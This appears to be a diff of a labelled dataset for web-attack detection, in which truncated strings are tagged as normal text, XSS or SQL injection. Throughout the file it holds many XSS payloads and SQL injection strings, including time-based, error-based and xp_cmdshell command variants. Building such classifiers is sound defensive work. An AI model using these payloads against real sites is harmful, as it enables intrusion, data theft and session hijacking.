+"<tt onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,5944 +<style>:target {color: red;}</style><img id=x styl,1,XSS,3069 +Bed Bath and Beyond:Save up to 50% on select items,0,normal,26329 +<h1 id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,3632 +"{""id"":null,""name"":""obtain imagine""}",0,normal,26882 +Select the right direction for your journey.,0,normal,24030 +"<em onmouseout=""alert(1)"">test</em>",1,XSS,3030 +"<style>@keyframes x{}</style><header style=""animat",1,XSS,2971 +select * from users where id = 1 %$ 1 union select,2,SQLi,11667 +<label onpointerenter=alert(1)>XSS</label>,1,XSS,8649 +"1"" ) or 5286 = ( select count ( * ) from all_users",2,SQLi,15159 +SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/,2,SQLi,22523 +"All About Nina, costarring Common, opens in select",0,normal,26393 +Very few voters will not select a more democratic ,0,normal,25188 +<style>:target {color:red;}</style><source id=x st,1,XSS,4266 +"-5131' ) ) ) union all select 4854,4854,4854,4854,",2,SQLi,17032 +1%' or exp ( ~ ( select * from ( select concat ( 0,2,SQLi,15649 +"<bdo draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7995 +1' ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ,2,SQLi,18461 +"1"" and elt ( 4249 = 4249,7259 ) and ""kgtz"" like ""k",2,SQLi,16728 +"< STYLE=""behavior: url(.htc);"">",1,XSS,8044 +select ( case when ( 3444 = 8424 ) then 3444 else ,2,SQLi,15991 +"<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC="";javas]",1,XSS,1624 +select case when 2640 = 9249 then 1 else null end-,2,SQLi,12878 +Where's the cathedral?,0,normal,23528 +1 ) ) as wwkw where 7289 = 7289 and 7533 = 7533--,2,SQLi,22183 +<details id=x tabindex=1 onfocus=alert(1)></detail,1,XSS,7187 +Select improve.,0,normal,24619 +<ins id=x tabindex=1 onfocus=alert(1)></ins>,1,XSS,5478 +Join tables where valid,0,normal,23368 +"1' ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,16461 +-alert(1)-',1,XSS,8999 +select * from users where id = '1' or @ @1 = 1 uni,2,SQLi,11375 +<style>@keyframes slidein {}</style><article style,1,XSS,8636 +date,0,normal,23196 +"-2305' in boolean mode ) union all select 8147,814",2,SQLi,18438 +"-8034"" or 8571 = 8571--",2,SQLi,18928 +1' where 1770 = 1770,2,SQLi,17688 +1' where 9024 = 9024 rlike ( select * from ( selec,2,SQLi,22264 +I need to decide where to take my next vacation.,0,normal,23755 +>><script>alert('XSS')</script>,1,XSS,1306 +<content onpointermove=alert(1)>XSS</content>,1,XSS,8431 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4036 +<form onpointerdown=alert(1)>XSS</form>,1,XSS,2601 +1 ) rlike ( select ( case when ( 7689 = 7689 ) the,2,SQLi,12811 +<command onpointerenter=alert(1)>XSS</command>,1,XSS,2575 +"<option oncut=""alert(1)"" contenteditable>test</opt",1,XSS,3189 +1' and 6510 = ( select count ( * ) from sysusers a,2,SQLi,19155 +<style>@keyframes slidein {}</style><strong style=,1,XSS,4834 +select ( case when ( 8294 = 4332 ) then 1 else 829,2,SQLi,20610 +-2717' ) ) ) or 8571 = 8571--,2,SQLi,16089 +Select obtain.,0,normal,24560 +<datalist id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,2108 +1 where 5925 = 5925 and 8189 = ( select count ( * ,2,SQLi,19066 +-7404' where 1536 = 1536 order by 1#,2,SQLi,15520 +1' ) and 3560 = 5467--,2,SQLi,12883 +-7737'|| ( select 'xalo' where 9219 = 9219 union a,2,SQLi,17774 +"{""id"":null,""firstName"":""Grasyah"",""lastName"":""Santh",0,normal,27177 +Getting herself fired allowed Trump to select a no,0,normal,26142 +1 ) where 2223 = 2223,2,SQLi,22373 +<kbd onpointerup=alert(1)>XSS</kbd>,1,XSS,7086 +end and ( ( ( 'hglq' like 'hglq,2,SQLi,13195 +<img src=foo.png onerror=alert(/xssed/) />,1,XSS,1281 +"1"" where 8379 = 8379 and 6414 = ( select count ( *",2,SQLi,13224 "<a onmouseover=""alert(document.cookie)"">xxs link</",1,XSS,805 -"-4966%"" union all select 4300,4300,4300,4300,4300,",2,SQLi,14597 -"1"" ) ) as paep where 8947 = 8947 and ( select 9067",2,SQLi,17940 -1' ) ) and 3754 = ( select upper ( xmltype ( chr (,2,SQLi,20876 -) or ( 'a' = 'a,2,SQLi,11383 -<nextid id=x tabindex=1 ondeactivate=alert(1)></ne,1,XSS,4567 -"{""id"":null,""name"":""means""}",0,normal,27173 -"1"" ) ) and 3754 = ( select upper ( xmltype ( chr (",2,SQLi,15359 -"<audio onkeydown=""alert(1)"" contenteditable>test</",1,XSS,4842 -1 ) or sleep ( 5 ) #,2,SQLi,19979 -1' ) ) as hqhs where 5383 = 5383,2,SQLi,22420 -following,0,normal,23237 -union all select @@version--,2,SQLi,10113 -"<isindex onkeydown=""alert(1)"" contenteditable>test",1,XSS,8706 --5217 where 3620 = 3620 or 3440 = cast ( ( chr ( 1,2,SQLi,20562 -"1 where 4968 = 4968 or updatexml ( 1808,concat ( 0",2,SQLi,17693 -1'+ ( select 'bmit' where 3716 = 3716 and row ( 62,2,SQLi,13860 -"<div id=""118""><div draggable=""true"" ondragstart=""e",1,XSS,9107 -<style>:target {color: red;}</style><p id=x style=,1,XSS,3453 -"iif ( 9342 = 6508,1,1/0 )",2,SQLi,20080 -"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,20627 -"<rt onmousemove=""alert(1)"">test</rt>",1,XSS,2199 -"1"" ) as drrx where 8633 = 8633 union all select nu",2,SQLi,16033 -"The select committee won out. Issa, understandably",0,normal,25351 -<template id=x tabindex=1 onfocusin=alert(1)></tem,1,XSS,4426 -"<style>@keyframes x{}</style><colgroup style=""anim",1,XSS,6151 -"-4148%"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( """,2,SQLi,14290 -1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char,2,SQLi,17328 +"iif ( 3447 = 1084,1,1/0 )",2,SQLi,14599 +1 ( select ( case when ( 5451 = 5451 ) then regexp,2,SQLi,17942 +"-5738"" ) as efbn where 8541 = 8541 union all selec",2,SQLi,20878 +"select * from users where id = 1 or "" ( ]"" or 1 = ",2,SQLi,11385 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4569 +"{""id"":null,""firstName"":""Suzie"",""lastName"":""Sng"",""a",0,normal,27171 +1' ) ) ) and 4595 = 4595#,2,SQLi,15361 +<rt onpointerdown=alert(1)>XSS</rt>,1,XSS,4844 +1 where 7882 = 7882,2,SQLi,19981 +"1"" or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,22422 +TRUE,0,normal,23239 +t'exec master..xp_cmdshell 'nslookup www.googl ...,2,SQLi,10115 +<style>:target {color:red;}</style><li id=x style=,1,XSS,8708 +"-4452%"" union all select 7141,7141,7141,7141,7141,",2,SQLi,20564 +1%' ) ) ) or ( select * from ( select ( sleep ( 5 ,2,SQLi,17695 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13862 +"<div id=""120""><script>function makePopups(){for (i",1,XSS,9109 +"<command onmouseenter=""alert(1)"">test</command>",1,XSS,3455 +-9721' ) or 9287 = 4362#,2,SQLi,20082 +"1"" where 4073 = 4073 rlike ( select ( case when ( ",2,SQLi,20629 +<input3 onpointerout=alert(1)>XSS</input3>,1,XSS,2200 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,16035 +"The select committee of 1873, appointed to inquire",0,normal,25353 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4428 +<head id=x tabindex=1 onfocusin=alert(1)></head>,1,XSS,6153 +1' or sleep ( 5 ) #,2,SQLi,14292 +-4363%' ) ) ) or 5903 = ( 'qqpjq'|| ( select case ,2,SQLi,17330 "<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""",1,XSS,823 -"1"" and 3707 = ( select count ( * ) from sysibm.sys",2,SQLi,15071 -1' in boolean mode ) and 3580 = ( select count ( *,2,SQLi,21390 -He'll modify the recipe.,0,normal,22997 -<style>:target {color:red;}</style><samp id=x styl,1,XSS,8357 -"1' ) and make_set ( 6488 = 5525,5525 )",2,SQLi,22004 -"1"" ) ) ) rlike ( select * from ( select ( sleep ( ",2,SQLi,20932 -1 ) ) as pzoo where 8036 = 8036 or 6793 = ( select,2,SQLi,12176 --4803%' ) ) or 8571 = 8571--,2,SQLi,18923 -"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,15150 -"javascript:/*""/*'/*\""/*`/*--></title></noembed></t",1,XSS,9504 -"-7234"" ) union all select 3154,3154,3154,3154#",2,SQLi,21592 -"{""id"":null,""firstName"":""Marinah"",""lastName"":""Maman",0,normal,26961 -"{""id"":null,""name"":""Honchkrow""}",0,normal,26875 -if ( 1087 = 5839 ) select 1087 else drop function ,2,SQLi,13576 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3055 -1' ) ) as anaq where 9605 = 9605 and elt ( 4249 = ,2,SQLi,20060 -Select a coffee roast for your morning cup.,0,normal,24161 -"<abbr onkeyup=""alert(1)"" contenteditable>test</abb",1,XSS,7219 -"<style>@keyframes x{}</style><link style=""animatio",1,XSS,6723 -"<hgroup draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,3301 -"1', ( select ( case when ( 7711 = 7711 ) then 1 el",2,SQLi,19695 -Where's the skate park?,0,normal,23606 -<ruby id=x tabindex=1 onfocus=alert(1)></ruby>,1,XSS,8520 -1'+ ( select 'vfkl' where 1713 = 1713 and 8514 = (,2,SQLi,16381 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10683 -"-6746"" ) or ( 8459 = 8459 ) *4906 and ( ""kohi"" lik",2,SQLi,14296 -1' ) ) as yyrx where 5600 = 5600,2,SQLi,22339 -#ERROR!,2,SQLi,10999 -1' ) ) ) and 8594 = ( select 8594 from pg_sleep ( ,2,SQLi,12601 -1 ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,17217 -")) AND ELT(1337=1337,SLEEP(5)) AND ((1337""=""1337",2,SQLi,11272 -"{""id"":null,""firstName"":""Ricky"",""lastName"":""Lee"",""s",0,normal,27337 -"1 where 8949 = 8949 and make_set ( 8403 = 8403,889",2,SQLi,19847 -"<section onkeydown=""alert(1)"" contenteditable>test",1,XSS,7644 --9197' ) or ( 6877 = 8010 ) *8010 and ( 'umwl' = ',2,SQLi,16439 -"-3666"" ) ) ) union all select 4136,4136,4136--",2,SQLi,14423 -"1%"" ) ) ) and row ( 6237,7469 ) > ( select count (",2,SQLi,19836 -Select a scenic view.,0,normal,22690 -; exec master..xp_cmdshell 'ping 172.10.1.255'--,2,SQLi,10094 -"<iframe src=""javascript:document.vulnerable=true; ",1,XSS,1482 -<style>:target {color:red;}</style><meta id=x styl,1,XSS,4874 -1' ) ) ) or char ( 119 ) ||char ( 100 ) ||char ( 9,2,SQLi,13088 -"1' where 3700 = 3700 union all select null,null,nu",2,SQLi,16003 -"<h1 onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,8039 -"1' ) ) and extractvalue ( 7982,concat ( 0x5c,0x717",2,SQLi,12343 -"-9557 ) where 2891 = 2891 union all select 2891,28",2,SQLi,19720 -1%' ) and 7533 = 7533 and ( '%' = ',2,SQLi,22401 -"1"" ) where 4905 = 4905 and char ( 109 ) ||char ( 7",2,SQLi,21311 -Start the Spotify app and select a song to play.,0,normal,25523 -<picture onfocusout=alert(1) tabindex=1 id=x></pic,1,XSS,5798 -AND 1 = utl_inaddr.get_host_address ( ( SELECT SYS,2,SQLi,11486 -"<noframes oncontextmenu=""alert(1)"">test</noframes>",1,XSS,5233 -1' ) ) as azsd where 3870 = 3870 waitfor delay '0:,2,SQLi,21468 -<style>:target {color:red;}</style><shadow id=x st,1,XSS,6646 -1' ) as gogu where 4338 = 4338 union all select nu,2,SQLi,15535 -<svg><span onload=alert(1)></span>,1,XSS,5491 +-9688%' ) ) or 2724 in ( ( char ( 113 ) +char ( 11,2,SQLi,15073 +"-5431"" ) ) ) or 4747 = dbms_utility.sqlid_to_sqlha",2,SQLi,21392 +I selected the perfect gift.,0,normal,22999 +"<var onkeypress=""alert(1)"" contenteditable>test</v",1,XSS,8359 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,22006 +"-1920' ) ) ) union all select 1424,1424,1424,1424,",2,SQLi,20934 +"1"" ) ) as lomw where 9257 = 9257 union all select ",2,SQLi,12178 +1'+ ( select 'qaar' where 7841 = 7841 or 5286 = ( ,2,SQLi,18925 +-5518 ) as yvqm where 7360 = 7360 union all select,2,SQLi,15152 +"javascript:""/*'//`//\""//</title></template/</texta",1,XSS,9506 +"-2959"" union all select 3414,3414,3414,3414,3414,3",2,SQLi,21594 +"{""id"":null,""name"":""KaiserGreymon""}",0,normal,26958 +Customers can select what they want delivered on a,0,normal,26254 +1' ) ) or 9643 = ( select count ( * ) from domain.,2,SQLi,13578 +<dt id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,3056 +"1%"" ) ) or 6979 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,20062 +Select the appropriate filter for the water.,0,normal,24163 +<figure id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,7221 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6725 +<map id=x tabindex=1 onbeforeactivate=alert(1)></m,1,XSS,3303 +-4965 ) as imga where 3705 = 3705 union all select,2,SQLi,19697 +Where's the ice rink?,0,normal,23608 +URL=javascript:alert(''),1,XSS,8522 +-7088'|| ( select 'arol' from dual where 8891 = 88,2,SQLi,16383 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10685 +1%' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ,2,SQLi,14298 +1 ) ) as cdhd where 2958 = 2958 or 5356 = ( select,2,SQLi,22341 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,11001 +"iif ( 2452 = 8999,1,1/0 )",2,SQLi,12603 +1%' ) ) ) or 4240 = ( select 4240 from pg_sleep ( ,2,SQLi,17219 +"AND ELT(1337=1337,SLEEP(5)) AND 1337""=""1337",2,SQLi,11274 +"{""id"":null,""firstName"":""Krisalya"",""lastName"":""Zaki",0,normal,27336 +"-3930%"" ) ) order by 1#",2,SQLi,19849 +<rp onpointerenter=alert(1)>XSS</rp>,1,XSS,7646 +-9509' ) ) ) or 1091 = 5477 and ( ( ( 'gsmz' = 'gs,2,SQLi,16441 +"-3037 ) where 9024 = 9024 union all select 9024,90",2,SQLi,14425 +1' ) as rvli where 4427 = 4427,2,SQLi,19838 +Filter the irrelevant comments.,0,normal,22692 +x' AND email IS NULL; --,2,SQLi,10096 +<script>a=/XSS/\ndocument.vulnerable=true;</script,1,XSS,1483 +<style>:target {transform: rotate(180deg);}</style,1,XSS,4876 +"1"" ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,13090 +"-7142' ) ) union all select 5083,5083,5083,5083#",2,SQLi,16005 +<button autofocus onfocus=alert(1)>test</button>,1,XSS,8041 +"1 ) ) procedure analyse ( extractvalue ( 9627,conc",2,SQLi,12345 +1' ) waitfor delay '0:0:5'--,2,SQLi,19722 +1' ) where 7322 = 7322 and 5556 = ( select count (,2,SQLi,22403 +"-6198"" ) or make_set ( 3602 = 2178,2178 ) and ( ""x",2,SQLi,21313 +Sports book betting odds 4 select your font face.,0,normal,25525 +"<meta onmouseout=""alert(1)"">test</meta>",1,XSS,5800 +select * from users where id = 1 %!<@ or 1 = 1 -- ,2,SQLi,11488 +"<address onclick=""alert(1)"">test</address>",1,XSS,5235 +"1"" ) ) as wssb where 5772 = 5772",2,SQLi,21470 +<strong onpointerdown=alert(1)>XSS</strong>,1,XSS,6648 +"1, ( select ( case when ( 9644 = 9644 ) then dbms_",2,SQLi,15537 +<video onpointerover=alert(1)>XSS</video>,1,XSS,5493 "<BASE HREF=""javascript:javascript:alert(1);//"">",1,XSS,769 -"1%"" ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18450 -Where's the estate?,0,normal,23571 -<style onblur=alert(1) tabindex=1 id=x></style><in,1,XSS,7312 -Select your organization.,0,normal,24862 +"-6475"" ) ) ) or 4144 = ( select upper ( xmltype ( ",2,SQLi,18452 +Where's the plantation?,0,normal,23573 +"<summary onkeypress=""alert(1)"" contenteditable>tes",1,XSS,7314 +Select your division.,0,normal,24864 "{""id"":null,""firstName"":""Johnny"",""lastName"":""Ong"",""",0,normal,27533 --9847%' ) ) ) or 3440 = cast ( ( chr ( 113 ) ||chr,2,SQLi,20909 -"<button onkeyup=""alert(1)"" contenteditable>test</b",1,XSS,2718 -<svg><figcaption onload=alert(1)></figcaption>,1,XSS,2080 -This is what I called triangulation in my evidence,0,normal,25299 +-7273%' ) ) order by 1#,2,SQLi,20911 +"<bdo onclick=""alert(1)"">test</bdo>",1,XSS,2719 +"<nextid onmouseup=""alert(1)"">test</nextid>",1,XSS,2081 +This gift will be a pledge of your purity of heart,0,normal,25301 "0&q=';alert(String.fromCharCode(88,83,83))//\';ale",1,XSS,952 -Select with precision.,0,normal,24443 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2483 -"<head><style type=""text/css"">@font-face {font-fami",1,XSS,9182 -"<style>@keyframes x{}</style><nobr style=""animatio",1,XSS,1760 -or'1=1,2,SQLi,9985 -"-7043"" ) where 9755 = 9755 union all select 9755,9",2,SQLi,20807 -Sort books.,0,normal,23089 -admin') or ('1'='1'/*,2,SQLi,9917 -"1' and 4241 = convert ( int, ( select char ( 113 )",2,SQLi,21567 -Select your struggle.,0,normal,24918 -1 ) ) ) or 4915 = ( select count ( * ) from domain,2,SQLi,20086 -"<main draggable=""true"" ondrag=""alert(1)"">test</mai",1,XSS,4244 --1549' ) or 4144 = ( select upper ( xmltype ( chr ,2,SQLi,17073 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19817 -"1%' ) and updatexml ( 3393,concat ( 0x2e,0x7171706",2,SQLi,13396 -"<time draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,4945 -"1"" ) or row ( 1045,7562 ) > ( select count ( * ) ,",2,SQLi,17351 -"<i onpaste=""alert(1)"" contenteditable>test</i>",1,XSS,5589 -1 ) ) as nnpe where 9720 = 9720 union all select n,2,SQLi,16242 -AnD SLEEP(5),2,SQLi,10396 -"1%"" ) ) rlike ( select * from ( select ( sleep ( 5",2,SQLi,19098 -<body onerror=alert(1) onload=/>,1,XSS,4758 -<link onfocusin=alert(1) id=x tabindex=1 style=dis,1,XSS,4381 -Merge the financial accounts.,0,normal,22705 -1 ) ) as gxvp where 3865 = 3865,2,SQLi,13473 -"1"" ) ) ) union all select null,null,null,null,null",2,SQLi,22360 --2530%' order by 1#,2,SQLi,19957 -1 ) or ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,12998 -"<u onkeydown=""alert(1)"" contenteditable>test</u>",1,XSS,5300 -"<rt draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,1991 -"-3391' union all select 2024,2024--",2,SQLi,12313 -1 ) ) as xmac where 7692 = 7692,2,SQLi,12952 --5861' ) or 1581 = 2611 and ( 'mvjh' like 'mvjh,2,SQLi,17590 --3862 ) ) as vqtl where 9629 = 9629 union all sele,2,SQLi,13491 -<figure onpointerup=alert(1)>XSS</figure>,1,XSS,4972 -"{""id"":null,""name"":""Indian Rhinoceros""}",0,normal,27246 -1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ,2,SQLi,13227 -<samp onpointerout=alert(1)>XSS</samp>,1,XSS,6784 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3601 -Insert the text.,0,normal,22875 -Select your scrutinize.,0,normal,24994 +Select ideal location.,0,normal,24445 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2484 +<html ontouchend=alert(1)>,1,XSS,9184 +<iframe onload=alert(1)></iframe>,1,XSS,1761 +"or ""1""=""1",2,SQLi,9987 +1' ) as ghvi where 3880 = 3880 and 4595 = 4595#,2,SQLi,20809 +Filter pool.,0,normal,23091 +admin') or '1'='1'--,2,SQLi,9919 +-8667'+ ( select ymmg where 6132 = 6132 union all ,2,SQLi,21569 +Select your contest.,0,normal,24920 +"-9178 where 2253 = 2253 union all select 2253,2253",2,SQLi,20088 +"<style>@keyframes x{}</style><meter style=""animati",1,XSS,4246 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,17075 +"1"" ) where 3058 = 3058 union all select null--",2,SQLi,19819 +"1 ) and ( select 9067 from ( select count ( * ) ,c",2,SQLi,13398 +<small onpointerenter=alert(1)>XSS</small>,1,XSS,4947 +select ( case when ( 5914 = 2314 ) then 5914 else ,2,SQLi,17353 +<rp id=x tabindex=1 ondeactivate=alert(1)></rp><in,1,XSS,5591 +select case when 2930 = 7964 then 1 else null end-,2,SQLi,16244 +AnD SLEEP(5)#,2,SQLi,10398 +"-7388"" ) as rlth where 5746 = 5746 or 5023 = ctxsy",2,SQLi,19100 +<svg><var onload=alert(1)></var>,1,XSS,4760 +<set onpointerover=alert(1)>XSS</set>,1,XSS,4383 +Create a beautiful mural.,0,normal,22707 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,13475 +select sleep ( 5 ) # wihl,2,SQLi,22362 +select ( case when ( 2751 = 8206 ) then 2751 else ,2,SQLi,19959 +1' ) ) and 4386 = utl_inaddr.get_host_address ( ch,2,SQLi,13000 +"<colgroup onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5302 +<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><in,1,XSS,1992 +"-3829%"" ) union all select 2218,2218,2218,2218,221",2,SQLi,12315 +1 ) and 5556 = ( select count ( * ) from all_users,2,SQLi,12954 +"select * from generate_series ( 3827,3827,case whe",2,SQLi,17592 +"-8002' ) ) ) union all select 6647,6647,6647--",2,SQLi,13493 +<q onpointerover=alert(1)>XSS</q>,1,XSS,4974 +"{""id"":null,""firstName"":""Jessie"",""lastName"":""Ting"",",0,normal,27244 +"1%' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex (",2,SQLi,13229 +"<output oncontextmenu=""alert(1)"">test</output>",1,XSS,6786 +<isindex onpointerover=alert(1)>XSS</isindex>,1,XSS,3603 +Delete the post.,0,normal,22877 +Select your check.,0,normal,24996 "{""id"":null,""name"":""everything""}",0,normal,27589 -"<colgroup onmouseup=""alert(1)"">test</colgroup>",1,XSS,8071 -"<embed draggable=""true"" ondrag=""alert(1)"">test</em",1,XSS,8578 -<video autoplay controls onseeked=alert(1)><source,1,XSS,7974 -ORDER BY 11,2,SQLi,10315 -"<;XML SRC="";http://ha.ckers.org/xsstest.xml""; ID=I",1,XSS,1626 -"1 ) ) ) and elt ( 3132 = 1541,1541 ) and ( ( ( 425",2,SQLi,16921 -"When the additional menu items appear, select Crea",0,normal,25151 -"<u onmouseenter=""alert(1)"">test</u>",1,XSS,7971 -"-4535' ) union all select 8491,8491,8491,8491,8491",2,SQLi,13225 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4213 -<iframe id=x tabindex=1 ondeactivate=alert(1)></if,1,XSS,6457 -"-6775"" union all select 7484,7484#",2,SQLi,19892 -"Choose, select.",0,normal,24778 -"javascript:/*""/*'/*`/*\""/**/ alert()//*</title></t",1,XSS,9525 -Where's the airport?,0,normal,23497 -"select * from users where id = 1 union select @<@,",2,SQLi,11695 -"<header onmousemove=""alert(1)"">test</header>",1,XSS,2709 -"1"" or 4411 = ( select count ( * ) from sysusers as",2,SQLi,21416 -<dd onpointerenter=alert(1)>XSS</dd>,1,XSS,6515 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4663 -"1"" where 8571 = 8571",2,SQLi,20406 -"<keygen onclick=""alert(1)"">test</keygen>",1,XSS,1855 -"<style>@keyframes slidein {}</style><s style=""anim",1,XSS,3073 -if ( 6624 = 4232 ) select 6624 else drop function ,2,SQLi,19257 -"1%"" ) ) and sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19415 -Peru's sol closed 0.30 percent lower and select st,0,normal,25782 -"1"" where 9083 = 9083 and ( select 2* ( if ( ( sele",2,SQLi,14756 -"<;IMG SRC="";jav&;#x0D;ascript:alert(';XSS';);"";>;",1,XSS,1646 -"<article onmouseover=""alert(1)"">test</article>",1,XSS,3418 -<time onpointerdown=alert(1)>XSS</time>,1,XSS,3477 -"{""id"":null,""name"":""Nurse Shark""}",0,normal,27011 -and 1=0) union all,2,SQLi,11054 -<legend id=x tabindex=1 ondeactivate=alert(1)></le,1,XSS,1793 -select ( case when ( 2140 = 5325 ) then 2140 else ,2,SQLi,13719 -1' ) where 6045 = 6045,2,SQLi,15115 -"<dd onclick=""alert(1)"">test</dd>",1,XSS,3798 -"<tfoot onmouseenter=""alert(1)"">test</tfoot>",1,XSS,3369 -"select * from users where id = 1 or "".%"" or 1 = 1 ",2,SQLi,11560 -"<sup onkeyup=""alert(1)"" contenteditable>test</sup>",1,XSS,7197 -"{""id"":null,""name"":""BlackWarGreymon""}",0,normal,27135 -1 ) as ahfj where 4776 = 4776 or 7417 = ( select c,2,SQLi,21494 -"1"" ) and updatexml ( 3393,concat ( 0x2e,0x7171706a",2,SQLi,22409 -select * from users where id = '1' or ( \. ) = 1 u,2,SQLi,11642 -"<svg onmouseenter=""alert(1)"">test</svg>",1,XSS,8796 -1,0,normal,26662 +<video onblur=alert(1) tabindex=1 id=x></video><in,1,XSS,8073 +"<menu onmousedown=""alert(1)"">test</menu>",1,XSS,8580 +"<map onkeypress=""alert(1)"" contenteditable>test</m",1,XSS,7976 +ORDER BY 13,2,SQLi,10317 +"<;META HTTP-EQUIV="";Set-Cookie""; Content="";USERID=",1,XSS,1627 +"-2821"" ) ) ) union all select 3920,3920,3920,3920,",2,SQLi,16923 +"When she does tour, it's usually very little and s",0,normal,25153 +"<input onmouseup=""alert(1)"">test</input>",1,XSS,7973 +1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ,2,SQLi,13227 +"<a oncut=""alert(1)"" contenteditable>test</a>",1,XSS,4215 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6459 +"-5420' ) union all select 2508,2508,2508,2508,2508",2,SQLi,19894 +You select first.,0,normal,24780 +"javascript:alert()//*-->*`/*'/*""/*\""/*</title></te",1,XSS,9527 +Where's the bus stop?,0,normal,23499 +AND 1 = utl_inaddr.get_host_address ( ( SELECT hos,2,SQLi,11697 +<dfn id=x tabindex=1 onfocus=alert(1)></dfn>,1,XSS,2710 +"1%"" union all select null,null,null,null,null,null",2,SQLi,21418 +"<dt onkeypress=""alert(1)"" contenteditable>test</dt",1,XSS,6517 +<style>:target {color: red;}</style><ul id=x style,1,XSS,4665 +1' ) ) union all select null#,2,SQLi,20408 +"<meter oncut=""alert(1)"" contenteditable>test</mete",1,XSS,1856 +<svg><textarea onload=alert(1)></textarea>,1,XSS,3074 +"select count ( * ) from domain.domains as t1,domai",2,SQLi,19259 +"1"" ) ) union all select null--",2,SQLi,19417 +People can select more than one race.,0,normal,25784 +"-4522"" ) or 4144 = ( select upper ( xmltype ( chr ",2,SQLi,14758 +"<;IMG&#x0D;SRC&#x0D;=&#x0D;"";&#x0D;j&#x0D;a&#x0D;v",1,XSS,1647 +<tbody id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,3420 +"<figure onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,3479 +"{""id"":null,""name"":""far""}",0,normal,27008 +23 or 1=1; --,2,SQLi,11056 +<meter id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,1794 +"-9140"" ) ) union all select 1623,1623,1623,1623,16",2,SQLi,13721 +"1"" ) where 2702 = 2702 and 6537 = dbms_pipe.receiv",2,SQLi,15117 +<div onpointerover=alert(1)>XSS</div>,1,XSS,3800 +"<meter onkeydown=""alert(1)"" contenteditable>test</",1,XSS,3371 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11562 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7199 +"{""id"":null,""name"":""Abyssinian""}",0,normal,27133 +1 ) ) and 6537 = dbms_pipe.receive_message ( chr (,2,SQLi,21496 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,22411 +"select * from users where id = 1 or ""1]"" or 1 = 1 ",2,SQLi,11644 +"<var onmousedown=""alert(1)"">test</var>",1,XSS,8798 +1,0,normal,26659 "<script>throw onerror=Uncaught=eval,e=new Error,e.",1,XSS,127 -<wbr id=x tabindex=1 onactivate=alert(1)></wbr>,1,XSS,5960 -1' ) ) and 5556 = ( select count ( * ) from all_us,2,SQLi,20261 --4091 ) ) as lqqy where 3030 = 3030 union all sele,2,SQLi,13636 -"1%' ) union all select null,null,null,null#",2,SQLi,15344 -"<nobr onmousedown=""alert(1)"">test</nobr>",1,XSS,4452 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7148 -"1"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,19916 +"<blockquote onmouseup=""alert(1)"">test</blockquote>",1,XSS,5962 +"-5182"" ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,20263 +1' ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240,2,SQLi,13638 +"1"" ) ) as femc where 1313 = 1313 and 4595 = 4595#",2,SQLi,15346 +"<style>@keyframes x{}</style><data style=""animatio",1,XSS,4454 +<style>:target {color:red;}</style><area id=x styl,1,XSS,7150 +"1' ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,19918 